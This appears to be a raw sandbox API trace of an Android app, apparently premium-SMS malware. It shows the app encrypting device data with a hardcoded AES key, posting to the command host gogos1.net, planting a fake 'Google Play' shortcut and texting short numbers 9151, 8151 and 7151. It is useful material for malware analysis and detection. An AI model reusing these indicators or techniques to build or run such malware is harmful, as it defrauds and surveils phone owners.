D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.System]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Object]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.xmlpull.v1.XmlPullParserFactory]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.kxml2.io.KXmlParser]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.kxml2.io.KXmlSerializer]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.xmlpull.v1.XmlPullParser]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.io.Reader]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.xmlpull.v1.XmlPullParser]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Environment]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.io.File]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3753): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.xmlpull.v1.XmlPullParser]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.xmlpull.v1.XmlPullParser]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Long]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [javax.crypto.spec.SecretKeySpec]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [javax.crypto.Cipher]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[B]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.security.Key]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[B]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.symmetric.AES$ECB]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 3753): [SDK] [javax.crypto.spec.SecretKeySpec][Constructor] [KEY][kgut6fhnc8kr3h87][type][AES][javax.crypto.Cipher][getInstance] [Cipher][AES] [javax.crypto.Cipher][getInstance] [Cipher][AES] [javax.crypto.Cipher][doFinal] [Data][board=samsung;brand=samsung;device=samsung;imei=null;imsi=null;session_id=1;operator=XXX;sms0=70123347172256821952;sms1=78341347192256879222;sms2=70136347112256830282;time=2018.06.07.04.44.33;timezone=Samoa Standard Time;] [Return][dzw4DD4IqY+yU/JYe2LEx7frx41OW+Fr4OkM0umOwQdb9sPX64Q44FsZBTgBLkLU4oRdv9R3iVbStNP/SGhNIW/rAhFuLVidtCPM6byO5u99LmRaP6GvnKjkVv/YZIBVgDDG3MPes0GFbJnytoKC6LSynAjjLuFVkLYXMJrpHf2XVV5Dkvb5rqPsNr0fV5ReoMXL/8/J0BwGLyHGUrt6ZU75xtxw1qgCV1+FwFAiwiDZkCwvhrGnW1gkUREKJxEZ0acn4WLM1mHU0SNEXa97zWazxKqLcxm2H5Jweq6auEE=]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.message.BasicNameValuePair]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.client.entity.UrlEncodedFormEntity]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.List]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.impl.client.BasicResponseHandler]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLSocketFactoryImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.io.InputStream]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Class]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [javax.crypto.spec.SecretKeySpec]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [javax.crypto.Cipher]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[B]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.security.Key]
D/S4URC   ( 3753): [SDK] [javax.crypto.spec.SecretKeySpec][Constructor] [KEY][kgut6fhnc8kr3h87][type][AES][javax.crypto.Cipher][getInstance] [Cipher][AES] [javax.crypto.Cipher][getInstance] [Cipher][AES] [javax.crypto.Cipher][doFinal] [Data][] [Return][]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.io.InputStream]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Class]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/data/app/ouepxayhr.efutel-1/base.apk]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [javax.crypto.spec.SecretKeySpec]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [javax.crypto.Cipher]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [[B]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.security.Key]
D/S4URC   ( 3753): [SDK] [javax.crypto.spec.SecretKeySpec][Constructor] [KEY][kgut6fhnc8kr3h87][type][AES][javax.crypto.Cipher][getInstance] [Cipher][AES] [javax.crypto.Cipher][getInstance] [Cipher][AES] [javax.crypto.Cipher][doFinal] [Data][naj+eMobt1tC2g5k9KQ8A7v8tLRocHhKT6Cklk/gY5vOV6ldHBn1shkX22BYuxORzlepXRwZ9bIZF9tgWLsTkS1nrw9Ba0TtZ1e48JXPVGen6X6++a2wJ9kLGiwnsNOO] [Return][359616040020430;359616040020431;359616040020433;359616040020433;359616040020434;352085050116552]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.IntentFilter]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.BroadcastReceiver]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.IntentFilter]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][notificationAction,
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3753): [SDK] [android.telephony.TelephonyManager] [getSubscriberId]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3753): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent$ShortcutIconResource]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [sendBroadcast] [Intent] Intent { act=com.android.launcher.action.INSTALL_SHORTCUT (has extras) } [ExtraInfo][key:value][android.intent.extra.shortcut.INTENT:Intent { act=android.intent.action.VIEW dat=http://gogos1.net/i/ flg=0x14000000 }][duplicate:false][android.intent.extra.shortcut.NAME:][android.intent.extra.shortcut.ICON_RESOURCE:android:drawable/ic_menu_search]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent$ShortcutIconResource]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [sendBroadcast] [Intent] Intent { act=com.android.launcher.action.INSTALL_SHORTCUT (has extras) } [ExtraInfo][key:value][android.intent.extra.shortcut.INTENT:Intent { flg=0x14000000 cmp=ouepxayhr.efutel/.xrbxlua }][duplicate:false][android.intent.extra.shortcut.NAME:Google Play][android.intent.extra.shortcut.ICON_RESOURCE:ouepxayhr.efutel:drawable/icon]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.webkit.WebSettings]
D/S4URC   ( 3753): [SDK] [android.webkit.WebView] [loadUrl] [Url][file:///android_asset/test.html]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/meminfo]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/meminfo]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.BroadcastReceiver]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 3753): [SDK] [android.webkit.WebView] [loadUrl] [Url][javascript:window.location.hash='file:///android_asset/test.html']
D/S4URC   ( 3753): [SDK] [android.webkit.WebView] [loadUrl] [Url][javascript: setScheme(0);]
D/S4URC   ( 3753): [SDK] [android.webkit.WebView] [loadUrl] [Url][javascript: setLimitState(0);]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [android.webkit.WebView] [loadUrl] [Url][javascript: setAndroidVersion('Android version: REL 5.1.1, SDK: 22; Board: samsung; Brand: samsung; Device: samsung; Display: galaxys5-user 5.1.1 LMY49J 8f616e92bc release-keys; Fingerprint: samsung/galaxy/galaxys5:5.1.1/LMY49J/8f616e92bc:user/release-keys; Host: ubuntu; ID: LMY49J; Manufacturer: samsung; Model: galaxys5; Product: galaxys5; Tags: release-keys; Type: user; User: root; Battery: 80%; Operator: XXX; Internet connection: true');]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Thread]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Runnable]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Service]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [93]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [93]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [93]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [android.webkit.WebView] [loadUrl] [Url][file:///android_asset/payed.html]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [94]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Long]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.Vector]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.SmsManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.PendingIntent]
D/S4URC   ( 3753): [SDK] [android.telephony.SmsManager] [sendTextMessage] [DesADD] [9151] [SourceADD] [null] [TextMessage] [70123347172256821952]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [94]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [94]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [94]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Thread]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [94]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Long]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.Vector]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.SmsManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.PendingIntent]
D/S4URC   ( 3753): [SDK] [android.telephony.SmsManager] [sendTextMessage] [DesADD] [8151] [SourceADD] [null] [TextMessage] [78341347192256879222]
D/S4URC   ( 3753): [SDK] [android.webkit.WebView] [loadUrl] [Url][javascript:window.location.hash='file:///android_asset/payed.html']
D/S4URC   ( 3753): [SDK] [android.webkit.WebView] [loadUrl] [Url][javascript: setScheme(0);]
D/S4URC   ( 3753): [SDK] [android.webkit.WebView] [loadUrl] [Url][javascript: setLimitState(0);]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [android.webkit.WebView] [loadUrl] [Url][javascript: setAndroidVersion('Android version: REL 5.1.1, SDK: 22; Board: samsung; Brand: samsung; Device: samsung; Display: galaxys5-user 5.1.1 LMY49J 8f616e92bc release-keys; Fingerprint: samsung/galaxy/galaxys5:5.1.1/LMY49J/8f616e92bc:user/release-keys; Host: ubuntu; ID: LMY49J; Manufacturer: samsung; Model: galaxys5; Product: galaxys5; Tags: release-keys; Type: user; User: root; Battery: 80%; Operator: XXX; Internet connection: true');]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [95]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [96]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [96]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Thread]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [96]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Long]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.Vector]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.SmsManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.PendingIntent]
D/S4URC   ( 3753): [SDK] [android.telephony.SmsManager] [sendTextMessage] [DesADD] [7151] [SourceADD] [null] [TextMessage] [70136347112256830282]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [97]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [98]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [98]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Thread]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [98]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Long]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.client.HttpClient]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.impl.client.DefaultHttpClient]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.client.methods.HttpPost]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.List]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.ArrayList]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.message.BasicNameValuePair]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.HttpEntity]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.client.entity.UrlEncodedFormEntity]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.util.List]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [org.apache.http.client.methods.HttpUriRequest]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [70]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [startService] [Intent] Intent { act=myboau.kqnrrcu.ajfncdotStart76 (has extras) } [ExtraInfo][key:value][apiKey:mapk01_20f][imei:null][imsi:null][type:notificationType][appId:76][phone:null]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
